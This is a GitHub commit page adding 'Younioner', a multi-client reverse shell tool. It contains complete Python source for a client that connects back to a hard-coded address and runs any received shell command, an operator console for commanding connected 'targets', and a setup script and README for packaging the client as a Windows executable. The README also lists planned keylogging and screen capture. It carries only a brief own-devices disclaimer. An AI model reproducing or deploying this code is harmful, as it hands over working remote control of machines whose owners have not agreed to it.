forked from xl7dev/WebShell
-
Notifications
You must be signed in to change notification settings - Fork 10
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
372 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
from socket import * | ||
import subprocess | ||
import os | ||
import time | ||
import sys | ||
|
||
ip = '192.168.1.88' # server ip, which you want to connect to | ||
port = 4343 # the port needs to be the same as server.py port in order to connect with server | ||
|
||
class Client: | ||
def __init__(self, _host, _port=3434): | ||
self.host = _host | ||
self.port = _port | ||
self.s = None | ||
|
||
self.launch() | ||
|
||
# run younioner | ||
def launch(self): | ||
try: | ||
self.open_socket() | ||
self.receive_commands() | ||
self.chat() | ||
|
||
except error as e: | ||
time.sleep(6) | ||
self.launch() | ||
|
||
# will create the socket | ||
def open_socket(self): | ||
try: | ||
self.s = socket(AF_INET, SOCK_STREAM) | ||
self.s.connect((self.host, self.port)) | ||
|
||
except: | ||
time.sleep(5) | ||
self.open_socket() | ||
|
||
# receive commands from the Server | ||
def receive_commands(self): | ||
try: | ||
while True: | ||
data = self.s.recv(1024) | ||
striped_data = data[:].strip().decode("utf-8") | ||
|
||
if striped_data[:2] == 'cd': | ||
os.chdir(striped_data[3:]) | ||
|
||
if len(data) > 0: | ||
try: | ||
cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stderr=subprocess.PIPE, | ||
stdout=subprocess.PIPE, stdin=subprocess.PIPE) | ||
result = str(cmd.stdout.read() + cmd.stderr.read(), "utf-8") | ||
|
||
self.s.send(str.encode(result + str(os.getcwd()) + " > ")) | ||
except: | ||
result = "Command not recognized \n" | ||
self.s.send(str.encode(result + str(os.getcwd()) + " > ")) | ||
|
||
|
||
# this condition will work when the user quit server.py | ||
if striped_data == "end-of-session": | ||
time.sleep(2) | ||
self.s.close() | ||
sys.exit(0) | ||
os._exit(0) | ||
exit(0) | ||
quit(0) | ||
|
||
self.s.close() | ||
|
||
except: | ||
time.sleep(5) | ||
self.receive_commands() | ||
|
||
if __name__ == '__main__': | ||
c = Client(ip, port) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
# Younioner | ||
Younioner is **multipale client** reverse shell created by Ayoub Ouakkaha, which is now under development | ||
|
||
## How to use it | ||
once you download the project(click on download zip button ) | ||
You can run this directly as python3 script | ||
* **windows** | ||
just write the command below in command prompt | ||
`python Server.py` | ||
to run Client just change Server.py with Client.py module: | ||
`python Client.py` | ||
|
||
* **Linux** | ||
you can run this also inside linux OS using bellow commands | ||
`python3 Server.py` | ||
to run Client just change Server.py with Client.py module: | ||
`python3 Client.py` | ||
|
||
## Make it Executable: | ||
instead of running python client.py every time we want to run the client module you can do this inside **windows** Using Py2Exe Library, after bellow proccess you will have .exe ready to run in anywhere without python, just follow me | ||
|
||
1. download and install the library using this link [sourceforge](https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/) | ||
|
||
2. with in command Prompt and inside the directory which you download the Younioner into run this command: | ||
`python setup.py install` | ||
3. that's it now you will be able to see dist folder just open it and you find **Client.exe** executable(its the one) | ||
|
||
To Do this Linux i only know one library that could get the job done which is **PyInstaller**, you can find more about this process using this link **[pythonhosted's website](https://pythonhosted.org/PyInstaller/)** | ||
|
||
## Younioner Features | ||
Younioner introduce tons of awesome Features, include: | ||
|
||
1. **Multiple Client Support:** this is really important when you're Dealing with all of targets, this feature allow you to take control of each connected target in individual. | ||
2. **Easy interface:** up to this moment **Younioner** project uses terminal or command prompt in windows, we plan to switch to GUI(probably in incoming releases), anyway interface is really simple | ||
3. **Easy commands**: yes no more stupid and complicated commands, **Younioner** offers you easy and realistic commands | ||
4. **All Platforms :** Younioner support all different platforms which includes Mobile(tested on android), Windows, Linux, OS X... | ||
5. **Under Developpement:** Younioner is under developpement which means a lot features are coming soon | ||
|
||
### so what is it Reverse Shell | ||
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. | ||
|
||
### get evolved with the project | ||
we plan to make Younioner a great project, but this won't happen without a cooperation from other developers. | ||
so feel free to join us.. | ||
|
||
### Important | ||
this project was made for security purposes. | ||
you have no right to use this in any device other than yours | ||
|
||
### Contact Me | ||
You can use this email to reach me **ayoub.ouakkaha@gmail.com** | ||
|
||
**MADE WITH PASSION AND LOVE** |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,220 @@ | ||
from socket import * | ||
import time | ||
import threading | ||
import sys | ||
import os | ||
from queue import Queue | ||
|
||
queue = Queue() | ||
host = '192.168.1.88' # your computer ip | ||
port = 4343 | ||
|
||
|
||
class Server: | ||
def __init__(self, _host, _port=3434, _max_client=20): | ||
|
||
# Variables used in this class are here | ||
self.host = _host | ||
self.port = _port | ||
self.max_client = _max_client # max amount of expected connections | ||
|
||
# once any client connected | ||
self.all_connection = [] # the connections will be stored here. | ||
self.all_addresses = [] # the addresses will be stored here. | ||
|
||
# create socket | ||
def open_socket(self): | ||
try: | ||
self.s = socket(AF_INET, SOCK_STREAM) | ||
self.s.bind((self.host, self.port)) | ||
|
||
logo = "__ __ _ ____ \n" \ | ||
"\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ \n" \ | ||
" \ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | \n" \ | ||
" | | (_) | |_| | | | | | (_) | | | | __/ _ < \n" \ | ||
" |_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ \n" | ||
|
||
print("\n\tWelcome to Younioner V1.1") | ||
print(logo) | ||
print('Created by Ayoub Ouakkaha, please visit our website www.ouakkaha.com') | ||
print('\ncontact us at contact@ouakkaha.com, type help to display available commands.') | ||
|
||
# listen for one connection :) | ||
self.s.listen(self.max_client) | ||
|
||
except error as e: | ||
print("** Oops Something went wrong error code ", e) | ||
time.sleep(5) # wait for 5s and try again | ||
self.open_socket() | ||
|
||
# accept incoming connection | ||
def accept_connection(self): | ||
for c in self.all_connection: # close the connection list | ||
c.close() | ||
del self.all_connection[:] # clean connection list | ||
del self.all_addresses[:] # clean addresses list | ||
|
||
while True: | ||
try: | ||
conn, address = self.s.accept() | ||
conn.setblocking(1) | ||
self.all_connection.append(conn) | ||
self.all_addresses.append(address) | ||
print("\n* new Connection has been established from {} on {}".format(address[0], address[1])) | ||
print("\nYounioner> ", end="") | ||
except error as e: | ||
print("something went wrong while accepting new connection\n error code: {} \n".format(str(e))) | ||
|
||
# Interactive shell for sending command remotely | ||
def start_younioner(self): | ||
|
||
while True: | ||
cmd = str(input("Younioner> ")) | ||
cmd = cmd.lower() | ||
cmd_stripped = cmd.strip() | ||
|
||
if cmd.strip() == 'list': | ||
self.list_connections() | ||
continue | ||
elif cmd.strip() == "help": | ||
self.displayHelp() | ||
|
||
elif cmd_stripped.startswith("select"): # check command start with `select` word | ||
conn = self.get_target(cmd) | ||
if conn is not None: | ||
self.send_commands(conn) | ||
elif cmd_stripped == "quit": | ||
self.exit() | ||
|
||
else: | ||
print("{} Command not recognized..".format(cmd)) | ||
|
||
# Display the help menu | ||
def displayHelp(self): | ||
"""Display The help menu""" | ||
help = "\nthis section will help to understand the basic commands: " \ | ||
"\n\nlist............ It will list availabel connection..Usage(just type : `list`)"\ | ||
"\n\nselect.......... used to select a connection to target.. the target number needs be availabel on list section Usage(select 1) or change the number 1 to the target ID"\ | ||
"\n\nquit............ used to close the current connection .. or if you don't have one it will close the script"\ | ||
"\n\nhelp............ as you might guess, it will print the help Menu, which you're looking to now.:)"\ | ||
"\n\nend-of-session.. this is really advance command..this command will delet your trace from the target command, for example it will delet the current running script on the target command which is(Client) "\ | ||
"\n\nIf you liked Our app and you want to help us for providing more and more.. please contact us at contact@ouakkaha.com or visit my site www.ouakkaha.com\nanyway thanks for using my app, be sure to have a greate day :)" | ||
|
||
|
||
print(help) | ||
# Exit Reverse Shell | ||
def exit(self): | ||
for c in self.all_connection: | ||
try: | ||
c.send(str.encode("end-of-session")) | ||
c.shutdown(2) | ||
c.close() | ||
except Exception as e: | ||
print('Could not close connection ' + str(e)) | ||
|
||
self.s.close() | ||
print("\n Good By, please have a nice day :) ") | ||
|
||
# this will be over need but believe me, some times the module refuse to exit.. | ||
# this is why i try each of this method cause at the end one of theme should work.. | ||
os._exit(0) | ||
sys.exit() | ||
quit(0) | ||
exit(0) | ||
|
||
|
||
# this will display all current connection | ||
def list_connections(self): | ||
rs = '' | ||
for i, conn in enumerate(self.all_connection): # Enumerate will count number of loop | ||
try: # we will test if conn are working.. | ||
conn.send(str.encode(' ')) # send blank to test if conn is working., | ||
conn.recv(20240) | ||
except: # this will ocure if conn is null | ||
del self.all_connection[i] | ||
del self.all_addresses[i] | ||
continue # go to next loop do not execut the next line.. | ||
rs += str(i) + '\t' + str(self.all_addresses[i][0]) + '\t' + str(self.all_addresses[i][1]) + '\n' | ||
|
||
|
||
print("Currently Available Targets") | ||
print("ID\tIP\t\t\t\tPORT\n" + rs) | ||
|
||
# Select a target client | ||
def get_target(self, cmd): | ||
target = cmd.replace('select ', '') | ||
try: | ||
target = int(target) | ||
except: | ||
print("Target index should be integer.") | ||
return None | ||
try: | ||
conn = self.all_connection[target] | ||
except: | ||
print("Not Invalid Selection..") | ||
return None | ||
|
||
print("You are now connected to", self.all_addresses[target][0]) | ||
print("Younioner.{} >> ".format(self.all_addresses[target][0]), end="") | ||
return conn | ||
|
||
# Connect with the target | ||
def send_commands(self, conn): | ||
while True: | ||
try: | ||
cmd = str(input()) | ||
|
||
if len(cmd) > 0: | ||
conn.send(str.encode(cmd)) | ||
client_response = str(conn.recv(20480), "utf-8") | ||
print(client_response, end="") | ||
|
||
# confirm quit | ||
if cmd == "quit": | ||
print("\nAre you sure, the socket will be closed for this moment..") | ||
confirm = str.upper(input("\t N / y >> ")) | ||
if confirm == "Y": | ||
break | ||
|
||
except: | ||
print("[!] Connection was lost ") | ||
break | ||
|
||
# Setting up threads | ||
def setup_threads(): | ||
server = Server('', port) | ||
for _ in range(2): | ||
t = threading.Thread(target=work, args=(server,)) | ||
t.daemon = True # It means when the script got closed the thread also will exit from process | ||
t.start() | ||
return | ||
|
||
|
||
# Do the next job in the queue(1: handles connection, other sends commands and get response back) | ||
def work(server): | ||
while True: | ||
x = queue.get() | ||
if x == 0: # 0: handles connection | ||
server.open_socket() | ||
server.accept_connection() | ||
if x == 1: # 1: sends commands to target machine | ||
server.start_younioner() | ||
queue.task_done() # [Done] jobs are done with success | ||
return | ||
|
||
|
||
# Each list item is a new job | ||
def create_jobs(): | ||
for x in range(2): | ||
queue.put(x) | ||
queue.join() | ||
return | ||
|
||
# the main function | ||
def main(): | ||
setup_threads() | ||
create_jobs() | ||
|
||
|
||
if __name__ == '__main__': | ||
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
|
||
\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ | ||
\ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | | ||
| | (_) | |_| | | | | | (_) | | | | __/ _ < | ||
|_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ | ||
|
||
|
||
Younioner Version 1.1 - created by Ayoub Ouakkaha. | ||
the ide behind the project is to make a simple tool let you take controle over your devices. | ||
up to now Younioner project is just a reverse shell, but i hope i could add this features in incoming release | ||
* G.U.I support : yes i plan to make the project support graphical user interface.. | ||
* Key Capture: yes younioner will include the key capture feature probably this feature will work only in windows.. but we will sya :) | ||
* Screen Capture | ||
* Executable Client: you'll have the option to genrate either client.py or client.exe | ||
|
||
please help us to develope the next version of Younioner 1.2 | ||
for more contact me on : | ||
ayoub.ouakkaha@gmail.com | ||
thanks in advance. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
from distutils.core import setup | ||
|
||
setup(console=['Client.py']) |